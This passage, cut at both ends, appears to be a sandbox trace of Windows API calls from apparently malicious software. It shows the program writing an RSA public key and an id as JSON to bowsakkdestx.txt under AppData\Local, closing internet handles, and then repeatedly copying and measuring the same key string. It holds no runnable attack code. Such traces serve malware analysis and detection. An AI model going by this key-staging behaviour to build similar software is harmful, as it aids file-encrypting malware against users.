pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0145.149] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0145.149] AreFileApisANSI () returned 1 [0145.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0145.149] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x7a) returned 0x741a00 [0145.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da670, cbMultiByte=-1, lpWideCharStr=0x741a00, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0145.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x98da47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0 [0145.150] GetFileType (hFile=0x3b0) returned 0x1 [0145.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x741a00 | out: hHeap=0x6e0000) returned 1 [0145.150] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 558 [0145.150] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1000) returned 0x3203ad0 [0145.150] WriteFile (in: hFile=0x3b0, lpBuffer=0x98d9118*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0x98d8a44, lpOverlapped=0x0 | out: lpBuffer=0x98d9118*, lpNumberOfBytesWritten=0x98d8a44*=0x22e, lpOverlapped=0x0) returned 1 [0145.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3203ad0 | out: hHeap=0x6e0000) returned 1 [0145.151] CloseHandle (hObject=0x3b0) returned 1 [0145.152] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0145.153] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0145.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3214588 | out: hHeap=0x6e0000) returned 1 [0145.153] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0145.153] lstrcpyA (in: lpString1=0x98dab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.153] lstrcpyA (in: lpString1=0x98da778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.153] lstrlenA (lpString="-----BEGIN PUBLIC 